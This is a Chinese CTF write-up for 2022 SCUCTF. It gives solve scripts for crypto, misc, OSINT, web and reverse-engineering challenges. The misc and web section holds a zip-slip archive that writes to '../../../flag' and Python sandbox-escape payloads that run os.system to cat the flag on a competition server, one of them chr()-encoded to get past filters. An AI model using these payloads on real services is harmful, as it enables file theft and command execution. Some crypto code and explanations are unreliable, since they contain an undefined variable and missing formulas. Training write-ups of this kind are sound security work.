2022SCUCTF题解

systemcall safe on

Crypto

ez_math

二次剩余求解二次同余方程。网上抄的脚本。

from Crypto.Util.number import *
p = 10633422823586641149987674611498617713504538254098629772932594430746901821947698235981680825181906211362587494944457098739784046411665369071558829066081189
a = 1998864314689507283073620353498454561179240654344354244305436493079140699439237202376223842334895492652637067218967769472206166222936609139445293873354277
def convertToBase(n, b):
	if(n < 2):
		return [n]
	temp = n
	ans = []
	while(temp != 0):
		ans = [temp % b]+ ans
		temp //= b
	return ans

#Takes integer n and odd prime p
#Returns both square roots of n modulo p as a pair (a,b)
#Returns () if no root
def cipolla(n,p):
	n %= p
	if(n == 0 or n == 1):
		return (n,-n%p)
	phi = p - 1
	if(pow(n, phi//2, p) != 1):
		return ()
	if(p%4 == 3):
		ans = pow(n,(p+1)//4,p)
		return (ans,-ans%p)
	aa = 0
	for i in range(1,p):
		temp = pow((i*i-n)%p,phi//2,p)
		if(temp == phi):
			aa = i
			break;
	exponent = convertToBase((p+1)//2,2)

	def cipollaMult(k,i,w,p):
		(a,b) = k
		(c,d) = i
		return ((a*c+b*d*w)%p,(a*d+b*c)%p)
	x1 = (aa,1)
	x2 = cipollaMult(x1,x1,aa*aa-n,p)
	for i in range(1,len(exponent)):
		if(exponent[i] == 0):
			x2 = cipollaMult(x2,x1,aa*aa-n,p)
			x1 = cipollaMult(x1,x1,aa*aa-n,p)
		else:
			x1 = cipollaMult(x1,x2,aa*aa-n,p)
			x2 = cipollaMult(x2,x2,aa*aa-n,p)
	return (x1[0],-x1[0]%p)

print("Roots of a mod p: " +str(cipolla(a,p)))
# print "Roots of 8218 mod 10007: " +str(cipolla(8218,10007))
# print "Roots of 56 mod 101: " +str(cipolla(56,101))
# print "Roots of 1 mod 11: " +str(cipolla(1,11))
# print "Roots of 8219 mod 10007: " +str(cipolla(8219,10007))
print(long_to_bytes(2983806571612194526961405572692022986638740339194067471831909775297069729649384214862874516129034255347837))
print(long_to_bytes(10633422823586641149987674611498617713504538254095645966360982236219940416375006212995042084842712143890755585169160029010134662196802494555429794810733352))

ez_RSA

遍历平方根上/下所有质数即可。

from Crypto.Util.number import *
from gmpy2 import *
from sympy import nextprime
n = 4035549166201063668625831121705576874008436911538281208575794760645544423624387564688426536718178366478435676670979144680200696978227814830144542100395711
c = 3786139261372475668724096193769377329093814957990266807059048553543359924439586359037603467723438602328535634566311132223900311678610183892863679621498865
# mid = iroot(n, 2)[0]
# ups = mid
# while True:
# 	# print(ups)
# 	ups = nextprime(ups)
# 	if n % ups == 0:
# 		print(ups, n // ups)
p = 63525972375092879554296019503424174440064543808584645254967172087718895967503
q = 63525972375092879554296019503424174440064543808584645254967172087718895782737
phi = (p - 1) * (q - 1)
e = 65537
d = inverse(e, phi)
print(long_to_bytes(pow(c, d, n)))

ez_stream

单纯的LCG

抄的网上的代码。

from functools import reduce
from Crypto.Util.number import GCD, inverse, long_to_bytes
def crack_unknown_increment(states, modulus, multiplier):
	increment = (states[1] - states[0]*multiplier) % modulus
	return modulus, multiplier, increment
def crack_unknown_multiplier(states, modulus):
	multiplier = (states[2] - states[1]) * inverse(states[1] - states[0], modulus) % modulus
	return crack_unknown_increment(states, modulus, multiplier)
def crack_unknown_modulus(states):
	diffs = [s1 - s0 for s0, s1 in zip(states, states[1:])]
	zeroes = [t2*t0 - t1*t1 for t0, t1, t2 in zip(diffs, diffs[1:], diffs[2:])]
	modulus = abs(reduce(GCD, zeroes))
	return crack_unknown_multiplier(states, modulus)
streams = [9495827047149859431006132233092319600974497202909253926749062926629593244068453225049157210427035578610572648934127458697875459018625442857002141732217770, 10115020037566558567950233730614138895861258911796641397386881027127960456781622215464273323776545118396888793579040620180155181472925379479313621734027106, 7981464236725021226761002919675861665400231148613997426185256093560877035104768633006706451402090228382477159223882030737510433675925204999566093494578649, 7234746427175795537750797360089344216037062205426141685667019106513326156971404038531885341019184616074232937324413429612387506532206135481520255585379406, 1357271691014350448396348499212607078815784207280436403590895273573976719039929574669406267302326522264476319971818333746270219399739509954488350206939098, 7793179134619447746786204535466843534146448146433627831440211439100356628823998206285679114995319552700902657159016155894261217929142592869048023480586212, 4200327504806355753051034681672501621139445844167069726269562915330857270053067365147343903654640822017169864193359688974572363544448011864141566263095749, 108628953170107941851019292289726767457637648818478130784905137964469415279928037910613035615390728484479166491155355807849114853079424541224944189539847, 5705546688186793363975386254231457567617039881042153075212145501441367909435598304220032988441701636156883589472050191697468859533156776122580445917630325, 7981888661925380274343353230517871440910482184881452246559514192102636787698437211797463663103264392789656523953870523387090188318571331660341390462731390, 7457245978258721215462104387713889824053460895409859984119211875448230853693133504670379095111834060476305868684456810408551054941569397242555875768832649, 4713653327629167917403933577518371673458093664892888492572355124165551105119901889718017605151941173424260920921889047705106706830968478068151992223522578, 2778597751579300390231070107111625883828070769573760110725311512998545986829373825533426150065870859785603212189825907356142828522955158081072354492809680, 9425692327305131597174516996805078131281224792942807687405090540733107737207289300618346774901368434264552235754283457515007094594155397130150749105141065, 9556791103080784553100760363166943075547406777892268608148510940860093314305835822848257344853594949658922763296325860053473764167311744969251511348213287, 3896599182642428007339381753538662783145048962607822890502362802858865113464050570340177651462017198029133580814296850288701444407514341373723669684607404, 5301032047745045360653610644813773116678094274772865081138467683002390318886475845448249954952652462684815881485467937894005492015515126563397015290271507, 10868560876138340913503045822008353068681490521878057747798994346359112617020680300987213799662349291611409047377282385725263726186142570966125699633074711, 7224059293852369017807048556361213684202031860793036930767704651075967932687581020962849350943008127181892942681851425187555531885333162641401020598706109, 7226506847869420283438523642497968822001335509181374339634589228508210118084622247062696000754665385287906355641339893928516640360280080695911187254582014, 4490720948265923860968128277045129252750568336235325441630922401592392266045933527280025412489344475057552346462497460984868092646213341802194388892641162, 12239413304325398135459519900658880538898158568425938945987878203058591924624777413114550809099368944806146909046355605791667787917390610337772668459482241, 12031682149667615392071800744401356969359813602233530042569742700015933405128350539724007232636961842858808427912797934459072652111927403074732121115504628, 4221093662830924228203427096071485647982605270125869903377211974849182525446297391581648132634312810831050522760260275007179715712643712807112993795753997, 2482697446655927304158367339258791596351991275787745319752390116410069174704817051381264029708263048001624482866674356617492861541235444301461140118393072, 8640022216821216730690651815111823956880449322964650463439245341042028148002067020497662105357100062992076913929538672631319194491404650014998985176729399, 2359340306264030427013371066451754161105421482248597639896728896779325719717468031430724904579038543182751480657717151072505664496249601885013517511335354, 9564043228397984061879998221762974239257692421128455446103840572377581806608193811671996975444148075468746455929973308146521294633753660232825656123106269, 2907481445175213163867320739818049791618436439840769557448890646035507771955530568981806701569558507904871970470593181264954913164043063396749090598187913, 10918758557560698694046891429167354585108582071006014989054758320395366657576667871567836659358610198829544520915724060818132910952992777240463509701288475]
modulus, multiplier, increment = (crack_unknown_modulus(streams))
flag = (streams[0] - increment) * inverse(multiplier, modules) % modulus
print(long_to_bytes(flag))

medium_math

中国剩余定理。爆破模数。检查是否全部printable

脚本网上抄的，

ps = [659393664465323, 906528195345220, 975250387802548, 969115381470588, 111169318220929, 1000427453556060, 954439163305195]
ans = [501927404661911, 766711039999273, 177155835710273, 288656999508165, 71725206442480, 876880066906893, 315100179694493]
import hashlib
from functools import reduce
from gmpy2 import gcd
from Crypto.Util.number import *
from string import printable

Num = 7
m = ps
a = ans
def egcd(a, b):
    if a == 0:
        return (b, 0, 1)
    else:
        g, y, x = egcd(b % a, a)
    return (g, x - (b // a) * y, y)

def china(num):
    m1,a1,lcm=m[0],a[0],m[0]
    for i in range(1,num):
        m2=m[i]
        a2=a[i]
        c=a2-a1
        g,k1,k2=egcd(m1,m2)
        lcm=lcm*m[i]//gcd(lcm,m[i])
        if c%g :
            print('No Answer!')
            return 0
        x0=c//g*k1
        t=m2//g
        x0=(x0%t+t)%t
        a1+=m1*x0
        m1=m2//g*m1
    return a1, lcm
ans, lcm=china(Num)
print(ans, lcm)
# print(ans + )
# f = open("mid", "w")
while ans.bit_length() < 355:
	ans += lcm
	fl = 1
	for i in long_to_bytes(ans):
		if not chr(i) in printable:
			fl = 0
			break
	if fl == 1:
		print(long_to_bytes(ans))
	# if b"scuctf" in long_to_bytes(ans):
	# f.write(str()))
	# print()

medium_RSA

from Crypto.Util.number import bytes_to_long, getPrime
from random import getrandbits
from secret import flag

m = bytes_to_long(flag)
e = 0x10001
Bit = 512
num = 10
p = getPrime(Bit)
q = getPrime(Bit)
n = p*q
c = pow(m, e, n)
A = 2*p + getrandbits(10)
for _ in range(num):
    A *= (2*p + getrandbits(10))

print(n)
print(c)
print(A)

# 126196923548625847007509156347769080356376807913358557231519237312422894719992338122246906927571014363916235486350310619563446000628702895891082078748068898399936770847800373026521881812370892139078625210278038341538895090439439843721400025947799897996722863432196226002591888931076933845502045941034749623889
# 48201959815948321069565015662369943530388516625817550173984537684351272970057989376745749566504500383464507283699368534431332408061844153810636139094917238717421462765300639466242642361876185462443217118831736122706041007461320278170789677013641147605940832111874004776737382832737196779409084954438407127011
# 635934922309055346133415678269698199759490946234253833414253522553283272521060237449330426878003238912309435024068834396107372320259122074959821922464016026569414146021226442896779730636129394313561087201211651897950138688482133353661884411272507838709344334674531685634247113077934870272463361844892145071231021375133594833632472876791648928626128037746641134480657927752695915345595036776971241257194429152473981570364935705304277053716095216265421853780155769033948892452930151216430983647179249168734308893517566620154442957585863110396358124440290667924012506125143006540451142042725611304829190947070296445962248992247787841311031371268925390245408945912685748053207863129569867935801356348840599681888158594922158857172284310611049606108621278846671375426752166943393136418632612473660552417600841557325266291241737036905449764635450581946496507308594218664500703837952466913617756023014717848436311977327781535355324353792039454042875230110617849576103379701892004917825581624772973169692549574252635296349080277276065341212380685231056993029811446518719799836853983138472053707659466665588336144567634073841407944750164301198933200128164294274125315737522109663725147569611022328892925518465495894355051512453795770592786125186631096793484922508032204114685327011130039081705937794968288418830498961017825920200116163134892907377383917068266857623939536637180017143935785568839086382108681164164045312727919908487558782010971051238407024505074658143919809174159493529587704704051028722305969193612028336083581711925255316496645056860103677961551431366746571804954569824501050909282628587517428323804928290882141395773404213425707798529483770890342295741666220344683595646791564252065280000

以下是exp

from gmpy2 import *
from sympy import *
from Crypto.Util.number import *
num = 10
n = 126196923548625847007509156347769080356376807913358557231519237312422894719992338122246906927571014363916235486350310619563446000628702895891082078748068898399936770847800373026521881812370892139078625210278038341538895090439439843721400025947799897996722863432196226002591888931076933845502045941034749623889
c = 48201959815948321069565015662369943530388516625817550173984537684351272970057989376745749566504500383464507283699368534431332408061844153810636139094917238717421462765300639466242642361876185462443217118831736122706041007461320278170789677013641147605940832111874004776737382832737196779409084954438407127011
A = 635934922309055346133415678269698199759490946234253833414253522553283272521060237449330426878003238912309435024068834396107372320259122074959821922464016026569414146021226442896779730636129394313561087201211651897950138688482133353661884411272507838709344334674531685634247113077934870272463361844892145071231021375133594833632472876791648928626128037746641134480657927752695915345595036776971241257194429152473981570364935705304277053716095216265421853780155769033948892452930151216430983647179249168734308893517566620154442957585863110396358124440290667924012506125143006540451142042725611304829190947070296445962248992247787841311031371268925390245408945912685748053207863129569867935801356348840599681888158594922158857172284310611049606108621278846671375426752166943393136418632612473660552417600841557325266291241737036905449764635450581946496507308594218664500703837952466913617756023014717848436311977327781535355324353792039454042875230110617849576103379701892004917825581624772973169692549574252635296349080277276065341212380685231056993029811446518719799836853983138472053707659466665588336144567634073841407944750164301198933200128164294274125315737522109663725147569611022328892925518465495894355051512453795770592786125186631096793484922508032204114685327011130039081705937794968288418830498961017825920200116163134892907377383917068266857623939536637180017143935785568839086382108681164164045312727919908487558782010971051238407024505074658143919809174159493529587704704051028722305969193612028336083581711925255316496645056860103677961551431366746571804954569824501050909282628587517428323804928290882141395773404213425707798529483770890342295741666220344683595646791564252065280000
# p = iroot(A // pow(2, 11), 11)[0]
p = 11084976913707120845676997473476120049925696537758139093110720348331501885877388177868038354130254514285517993448105804093297456650430613525974991412673613
q = n // p
phi = (p - 1) * (q - 1)
e = 65537
d = inverse(e, phi)
print(long_to_bytes(pow(c, d, n)))
# p = iroot(A, 10)[0] // pow(2, 10)
# while True:
# 	# print(p)
# 	p = prevprime(p)
# 	if n % p == 0:
# 		print(p)
# 		break

medium_stream

秘钥复用。

from pwn import xor
from Crypto.Util.number import *
flag_k = 0x17cd2b76cea2303805f63a5dd38c0652f542d796d316dfcbc1ca5d0514f6096bb4f41fd2d2f45de0114a2b7d
known =  0x37e64f5efb8f3e7b7ba12f0d8fd84508a6129fc19051c1ddcb821f4242b6507be1e758c686a108f2455a3c7d

# flag_k = long_to_bytes(flag_k)
# knwon = long_to_bytes(known)
knwon_p = bytes_to_long(b'sh1kaku{Of all weapons,the past cut deepest}')
lens = len(long_to_bytes(flag_k))
# print(lens, len(long_to_bytes(known)), 5120)
# print(xor(flag_k, known))
print(long_to_bytes(flag_k ^ known ^ knwon_p))

ez_copper

考虑类似Factor with high bits known的做法

把多项式F(x) 变成，首一化后coppersmith即可。

然后就是基础的RSA

medium_copper

先通过dp泄露的原理推式子，得到，可以得知

考虑在模的意义下解方程，即，解出来后为的可能值，然后就是ez_copper

hard_math

考虑flag的前7位是一定的，枚举模数p，求出p的原根后可以列出以七个变量的七个方程，解出方程验证后还原flag即可

Misc

LSB but base64

先用stegesolve查看LSB发现均为乱码

根据提示：b64encode得知要base64加密先将16进制数字转变回byte再base64加密

from base64 import *
from Crypto.Util.number import *
a=0x7E56A0FA2B3E5B795CD267BEEE8FB972E72D7FEE2777E9B5B1CFA2E7EBF7AF2F9FBA79F2
byte = long_to_bytes(a)
b64encode(byte)

得到结果

豪豪的晚餐

1. 图片中有烤匠两个字确定店子是烤匠
2. exif查看有经纬度，谷歌地图定位后找一个标志后输入到百度地图中点周边，美食，看最近的一家烤匠再去美团核实店名即可。

小宇的通勤

向上的指示牌是地铁2号和8号线，发现是同一种颜色，上网搜地铁线路标识色发现只有深圳地铁2号和8号是同一条，再看下面的地铁是黄色的确定是14号线，看交汇点既是结果：岗厦北。

豪豪扫描器

notepad++直接搜scu得到答案

Chicken

010editor打开最底下发现一串base64解码即使答案

后来

解的时候走了很多弯路，识图都识别不出来，试了很多办法都没用，搜索结果中也没有想要的，最后在浏览一个网址的时候发现和图中白色柱子长得一样的柱子。

[medium]unzip

from zipfile import *
from base64 import *
zipf = ZipFile("Uploads.zip", "w")
source_file = "flag"
zipf.write(source_file, "../../../flag")
zipf.close()

fi = open("Uploads.zip", "rb")
base64d = b64encode(fi.read())
print(base64d.decode("ascii"))

上传该文件，然后再 2查看解压后的文件地址，读出 /flag。

[easy]learning_python

from pwn import *
context(log_level = "debug")
sh = remote("114.117.187.56", 8901)
sh.recv()
payload = '__import__("os").system("cd .. ; cd .. ; cat flag")'
sh.sendline(payload.encode())
sh.recv()

[medium]learning python2

from pwn import *
context(log_level = "debug")
sh = remote("114.117.187.56", 8902)
sh.recv()
payload = '__import__("os").system("cd .. ; cd .. ; cat flag")'
payloads = "eval("
for i in payload:
	payloads += ("chr(" + str(ord(i)) + ")" + "+")
payloads = payloads[0:-1] + ")"
print(payloads)
sh.sendline(payloads.encode())
sh.recv()

learning python3

没有好好验题是这样的。

预期解可能是用 __subclasses__之类的花活。

from pwn import *
context(log_level = "debug")
sh = remote("114.117.187.56", 8903)
sh.recv()
payload = 'print(open("/flag", "r").read())'
sh.sendline(payload.encode())
sh.recv()

Reverse

ez_pyc

反编译。一眼z3-solver

from z3 import *

flag = [BitVec("%d" % i, 8) for i in range(25)]
s = Solver()
s.add(99 * flag[0] + 91 * flag[1] + 69 * flag[2] + 42 * flag[3] + 65 * flag[4] + 86 * flag[5] + 63 * flag[6] + 9 * flag[7] + 60 * flag[8] + 82 * flag[9] + 61 * flag[10] + 65 * flag[11] + 14 * flag[12] + 86 * flag[13] + 2 * flag[14] + 53 * flag[15] + 56 * flag[16] + 17 * flag[17] + 88 * flag[18] + 20 * flag[19] + 6 * flag[20] + 21 * flag[21] + 100 * flag[22] + 24 * flag[23] + 11 * flag[24] == 133017)
s.add(99 * flag[0] + 2 * flag[1] + 14 * flag[2] + 30 * flag[3] + 38 * flag[4] + 23 * flag[5] + 6 * flag[6] + 100 * flag[7] + 43 * flag[8] + 58 * flag[9] + 82 * flag[10] + 20 * flag[11] + 19 * flag[12] + 39 * flag[13] + 16 * flag[14] + 1 * flag[15] + 15 * flag[16] + 82 * flag[17] + 97 * flag[18] + 47 * flag[19] + 28 * flag[20] + 51 * flag[21] + 96 * flag[22] + 54 * flag[23] + 43 * flag[24] == 113856)
s.add(63 * flag[0] + 86 * flag[1] + 33 * flag[2] + 39 * flag[3] + 45 * flag[4] + 76 * flag[5] + 37 * flag[6] + 64 * flag[7] + 65 * flag[8] + 56 * flag[9] + 32 * flag[10] + 69 * flag[11] + 38 * flag[12] + 1 * flag[13] + 20 * flag[14] + 44 * flag[15] + 16 * flag[16] + 78 * flag[17] + 12 * flag[18] + 97 * flag[19] + 29 * flag[20] + 46 * flag[21] + 54 * flag[22] + 81 * flag[23] + 47 * flag[24] == 126193)
s.add(9 * flag[0] + 100 * flag[1] + 1 * flag[2] + 5 * flag[3] + 99 * flag[4] + 20 * flag[5] + 37 * flag[6] + 91 * flag[7] + 53 * flag[8] + 85 * flag[9] + 52 * flag[10] + 49 * flag[11] + 69 * flag[12] + 32 * flag[13] + 7 * flag[14] + 81 * flag[15] + 80 * flag[16] + 89 * flag[17] + 87 * flag[18] + 24 * flag[19] + 90 * flag[20] + 54 * flag[21] + 16 * flag[22] + 6 * flag[23] + 2 * flag[24] == 128397)
s.add(72 * flag[0] + 18 * flag[1] + 71 * flag[2] + 28 * flag[3] + 67 * flag[4] + 25 * flag[5] + 26 * flag[6] + 59 * flag[7] + 96 * flag[8] + 30 * flag[9] + 65 * flag[10] + 39 * flag[11] + 29 * flag[12] + 35 * flag[13] + 95 * flag[14] + 55 * flag[15] + 67 * flag[16] + 63 * flag[17] + 72 * flag[18] + 61 * flag[19] + 30 * flag[20] + 74 * flag[21] + 38 * flag[22] + 61 * flag[23] + 58 * flag[24] == 138932)
s.add(30 * flag[0] + 69 * flag[1] + 52 * flag[2] + 68 * flag[3] + 94 * flag[4] + 37 * flag[5] + 13 * flag[6] + 85 * flag[7] + 97 * flag[8] + 66 * flag[9] + 57 * flag[10] + 40 * flag[11] + 11 * flag[12] + 93 * flag[13] + 87 * flag[14] + 22 * flag[15] + 61 * flag[16] + 3 * flag[17] + 17 * flag[18] + 54 * flag[19] + 22 * flag[20] + 18 * flag[21] + 57 * flag[22] + 58 * flag[23] + 88 * flag[24] == 136211)
s.add(81 * flag[0] + 62 * flag[1] + 83 * flag[2] + 60 * flag[3] + 71 * flag[4] + 64 * flag[5] + 96 * flag[6] + 88 * flag[7] + 96 * flag[8] + 39 * flag[9] + 23 * flag[10] + 77 * flag[11] + 85 * flag[12] + 87 * flag[13] + 3 * flag[14] + 3 * flag[15] + 56 * flag[16] + 67 * flag[17] + 59 * flag[18] + 11 * flag[19] + 32 * flag[20] + 41 * flag[21] + 1 * flag[22] + 71 * flag[23] + 10 * flag[24] == 141572)
s.add(95 * flag[0] + 66 * flag[1] + 37 * flag[2] + 55 * flag[3] + 2 * flag[4] + 29 * flag[5] + 65 * flag[6] + 85 * flag[7] + 68 * flag[8] + 95 * flag[9] + 77 * flag[10] + 16 * flag[11] + 2 * flag[12] + 94 * flag[13] + 54 * flag[14] + 92 * flag[15] + 44 * flag[16] + 48 * flag[17] + 70 * flag[18] + 25 * flag[19] + 57 * flag[20] + 48 * flag[21] + 74 * flag[22] + 63 * flag[23] + 49 * flag[24] == 143300)
s.add(79 * flag[0] + 85 * flag[1] + 53 * flag[2] + 93 * flag[3] + 69 * flag[4] + 33 * flag[5] + 63 * flag[6] + 2 * flag[7] + 93 * flag[8] + 82 * flag[9] + 73 * flag[10] + 37 * flag[11] + 91 * flag[12] + 13 * flag[13] + 1 * flag[14] + 62 * flag[15] + 60 * flag[16] + 17 * flag[17] + 7 * flag[18] + 95 * flag[19] + 65 * flag[20] + 91 * flag[21] + 14 * flag[22] + 64 * flag[23] + 66 * flag[24] == 146502)
s.add(33 * flag[0] + 57 * flag[1] + 13 * flag[2] + 85 * flag[3] + 83 * flag[4] + 31 * flag[5] + 73 * flag[6] + 41 * flag[7] + 19 * flag[8] + 41 * flag[9] + 80 * flag[10] + 33 * flag[11] + 5 * flag[12] + 42 * flag[13] + 3 * flag[14] + 27 * flag[15] + 1 * flag[16] + 55 * flag[17] + 24 * flag[18] + 72 * flag[19] + 21 * flag[20] + 98 * flag[21] + 89 * flag[22] + 58 * flag[23] + 41 * flag[24] == 118533)
s.add(29 * flag[0] + 5 * flag[1] + 52 * flag[2] + 22 * flag[3] + 21 * flag[4] + 8 * flag[5] + 41 * flag[6] + 10 * flag[7] + 51 * flag[8] + 69 * flag[9] + 90 * flag[10] + 63 * flag[11] + 90 * flag[12] + 24 * flag[13] + 91 * flag[14] + 99 * flag[15] + 40 * flag[16] + 6 * flag[17] + 17 * flag[18] + 81 * flag[19] + 47 * flag[20] + 100 * flag[21] + 99 * flag[22] + 3 * flag[23] + 46 * flag[24] == 124392)
s.add(59 * flag[0] + 64 * flag[1] + 99 * flag[2] + 26 * flag[3] + 76 * flag[4] + 42 * flag[5] + 37 * flag[6] + 62 * flag[7] + 14 * flag[8] + 15 * flag[9] + 15 * flag[10] + 49 * flag[11] + 10 * flag[12] + 88 * flag[13] + 5 * flag[14] + 3 * flag[15] + 52 * flag[16] + 70 * flag[17] + 89 * flag[18] + 37 * flag[19] + 98 * flag[20] + 1 * flag[21] + 18 * flag[22] + 75 * flag[23] + 13 * flag[24] == 118223)
s.add(66 * flag[0] + 65 * flag[1] + 5 * flag[2] + 80 * flag[3] + 42 * flag[4] + 93 * flag[5] + 42 * flag[6] + 15 * flag[7] + 1 * flag[8] + 90 * flag[9] + 4 * flag[10] + 14 * flag[11] + 97 * flag[12] + 25 * flag[13] + 68 * flag[14] + 93 * flag[15] + 78 * flag[16] + 33 * flag[17] + 33 * flag[18] + 70 * flag[19] + 21 * flag[20] + 10 * flag[21] + 25 * flag[22] + 92 * flag[23] + 43 * flag[24] == 122643)
s.add(25 * flag[0] + 95 * flag[1] + 15 * flag[2] + 82 * flag[3] + 82 * flag[4] + 99 * flag[5] + 9 * flag[6] + 60 * flag[7] + 74 * flag[8] + 8 * flag[9] + 82 * flag[10] + 99 * flag[11] + 79 * flag[12] + 83 * flag[13] + 8 * flag[14] + 42 * flag[15] + 41 * flag[16] + 75 * flag[17] + 93 * flag[18] + 75 * flag[19] + 36 * flag[20] + 57 * flag[21] + 84 * flag[22] + 99 * flag[23] + 67 * flag[24] == 166882)
s.add(26 * flag[0] + 14 * flag[1] + 83 * flag[2] + 22 * flag[3] + 62 * flag[4] + 50 * flag[5] + 68 * flag[6] + 95 * flag[7] + 27 * flag[8] + 99 * flag[9] + 29 * flag[10] + 31 * flag[11] + 12 * flag[12] + 37 * flag[13] + 18 * flag[14] + 51 * flag[15] + 36 * flag[16] + 72 * flag[17] + 98 * flag[18] + 96 * flag[19] + 25 * flag[20] + 49 * flag[21] + 6 * flag[22] + 59 * flag[23] + 2 * flag[24] == 120884)
s.add(15 * flag[0] + 51 * flag[1] + 6 * flag[2] + 80 * flag[3] + 72 * flag[4] + 49 * flag[5] + 13 * flag[6] + 28 * flag[7] + 57 * flag[8] + 1 * flag[9] + 43 * flag[10] + 82 * flag[11] + 36 * flag[12] + 36 * flag[13] + 55 * flag[14] + 2 * flag[15] + 96 * flag[16] + 29 * flag[17] + 2 * flag[18] + 82 * flag[19] + 60 * flag[20] + 65 * flag[21] + 100 * flag[22] + 37 * flag[23] + 12 * flag[24] == 118151)
s.add(32 * flag[0] + 44 * flag[1] + 6 * flag[2] + 70 * flag[3] + 17 * flag[4] + 49 * flag[5] + 66 * flag[6] + 51 * flag[7] + 29 * flag[8] + 13 * flag[9] + 38 * flag[10] + 26 * flag[11] + 27 * flag[12] + 18 * flag[13] + 73 * flag[14] + 1 * flag[15] + 67 * flag[16] + 45 * flag[17] + 10 * flag[18] + 49 * flag[19] + 63 * flag[20] + 9 * flag[21] + 75 * flag[22] + 46 * flag[23] + 88 * flag[24] == 105637)
s.add(39 * flag[0] + 90 * flag[1] + 54 * flag[2] + 62 * flag[3] + 25 * flag[4] + 97 * flag[5] + 53 * flag[6] + 92 * flag[7] + 90 * flag[8] + 34 * flag[9] + 53 * flag[10] + 91 * flag[11] + 84 * flag[12] + 78 * flag[13] + 88 * flag[14] + 8 * flag[15] + 88 * flag[16] + 24 * flag[17] + 86 * flag[18] + 33 * flag[19] + 98 * flag[20] + 46 * flag[21] + 69 * flag[22] + 80 * flag[23] + 47 * flag[24] == 168627)
s.add(1 * flag[0] + 50 * flag[1] + 59 * flag[2] + 85 * flag[3] + 14 * flag[4] + 89 * flag[5] + 12 * flag[6] + 64 * flag[7] + 1 * flag[8] + 49 * flag[9] + 97 * flag[10] + 8 * flag[11] + 11 * flag[12] + 59 * flag[13] + 40 * flag[14] + 13 * flag[15] + 73 * flag[16] + 82 * flag[17] + 98 * flag[18] + 50 * flag[19] + 43 * flag[20] + 70 * flag[21] + 93 * flag[22] + 5 * flag[23] + 7 * flag[24] == 123563)
s.add(83 * flag[0] + 41 * flag[1] + 15 * flag[2] + 86 * flag[3] + 1 * flag[4] + 18 * flag[5] + 7 * flag[6] + 93 * flag[7] + 72 * flag[8] + 49 * flag[9] + 48 * flag[10] + 26 * flag[11] + 83 * flag[12] + 70 * flag[13] + 18 * flag[14] + 28 * flag[15] + 32 * flag[16] + 77 * flag[17] + 81 * flag[18] + 5 * flag[19] + 61 * flag[20] + 8 * flag[21] + 98 * flag[22] + 94 * flag[23] + 22 * flag[24] == 125124)
s.add(40 * flag[0] + 63 * flag[1] + 90 * flag[2] + 28 * flag[3] + 52 * flag[4] + 79 * flag[5] + 21 * flag[6] + 77 * flag[7] + 86 * flag[8] + 91 * flag[9] + 50 * flag[10] + 95 * flag[11] + 82 * flag[12] + 30 * flag[13] + 60 * flag[14] + 2 * flag[15] + 97 * flag[16] + 33 * flag[17] + 11 * flag[18] + 30 * flag[19] + 64 * flag[20] + 40 * flag[21] + 4 * flag[22] + 2 * flag[23] + 1 * flag[24] == 126844)
s.add(61 * flag[0] + 9 * flag[1] + 36 * flag[2] + 17 * flag[3] + 13 * flag[4] + 53 * flag[5] + 96 * flag[6] + 41 * flag[7] + 28 * flag[8] + 63 * flag[9] + 20 * flag[10] + 4 * flag[11] + 71 * flag[12] + 99 * flag[13] + 37 * flag[14] + 2 * flag[15] + 58 * flag[16] + 38 * flag[17] + 75 * flag[18] + 29 * flag[19] + 34 * flag[20] + 66 * flag[21] + 82 * flag[22] + 39 * flag[23] + 50 * flag[24] == 116479)
s.add(51 * flag[0] + 56 * flag[1] + 13 * flag[2] + 6 * flag[3] + 80 * flag[4] + 8 * flag[5] + 99 * flag[6] + 76 * flag[7] + 14 * flag[8] + 32 * flag[9] + 99 * flag[10] + 7 * flag[11] + 27 * flag[12] + 32 * flag[13] + 20 * flag[14] + 23 * flag[15] + 79 * flag[16] + 89 * flag[17] + 54 * flag[18] + 78 * flag[19] + 23 * flag[20] + 89 * flag[21] + 96 * flag[22] + 85 * flag[23] + 94 * flag[24] == 139277)
s.add(3 * flag[0] + 17 * flag[1] + 78 * flag[2] + 6 * flag[3] + 75 * flag[4] + 18 * flag[5] + 29 * flag[6] + 1 * flag[7] + 49 * flag[8] + 8 * flag[9] + 90 * flag[10] + 60 * flag[11] + 62 * flag[12] + 13 * flag[13] + 16 * flag[14] + 87 * flag[15] + 38 * flag[16] + 71 * flag[17] + 39 * flag[18] + 12 * flag[19] + 47 * flag[20] + 7 * flag[21] + 54 * flag[22] + 83 * flag[23] + 64 * flag[24] == 109760)
s.add(58 * flag[0] + 1 * flag[1] + 51 * flag[2] + 94 * flag[3] + 69 * flag[4] + 86 * flag[5] + 45 * flag[6] + 14 * flag[7] + 23 * flag[8] + 4 * flag[9] + 25 * flag[10] + 9 * flag[11] + 72 * flag[12] + 85 * flag[13] + 35 * flag[14] + 39 * flag[15] + 92 * flag[16] + 43 * flag[17] + 19 * flag[18] + 26 * flag[19] + 76 * flag[20] + 55 * flag[21] + 52 * flag[22] + 59 * flag[23] + 24 * flag[24] == 121674)

a = s.check()
print(a)
result = s.model()
print(result)
for i in range(26):
    print(chr(result[i]), end = "")
# result = [18 = 118,
#  20 = 114,
#  24 = 121,
#  2 = 108,
#  12 = 97,
#  13 = 110,
#  3 = 111,
#  10 = 104,
#  15 = 85,
#  17 = 105,
#  7 = 83,
#  16 = 110,
#  21 = 115,
#  23 = 116,
#  5 = 101,
#  14 = 95,
#  22 = 105,
#  9 = 99,
#  6 = 95,
#  11 = 117,
#  1 = 95,
#  19 = 101,
#  8 = 105,
#  0 = 73,
#  4 = 118]
# print(result)

Tower of Hanoi

Upx脱壳一下，ida反编译，

异或回去即可

DEBUG

Ida反编译后发现代码为对一个字符串30次随机两个位置交换，gdb看一下随机数

Gdb发现进去后会RE，patch掉即可

ez_logic

Ida反编译后发现由许多setjmp和longjmp组成，发现算法为相邻两个一组做区间加法，并且区间有序，差分后从前到后匹配即可

RE_签到

ida反编译一下

找到flag

ez_base

ida反编译后，仔细阅读发现就是一张的地图上有一些可以走的点，要求每个点只走一次且按“马”的方式走从到，BFS即可

ez_vm

ida反编译后，已知一个操作列表，逐步完成操作

经分析：

Case 0:把栈顶两个数相加

Case 1:把栈顶两个数相减

Case 2:把栈顶两个数相异或

Case 3:把栈顶两个数相比较

Case 4,5,6:为比较后的跳转

Case 7:对栈顶的数在另一个数组中下标转值

Case 8:改写数组

Case 9:向栈里加一个数

Case 10:Wrong

Case 11:Right

Case 12:跳转

令另一个数组为Str[]

发现一些结构如

9 A 9 B 8 -> str[B]=A

9 A 9 100 8
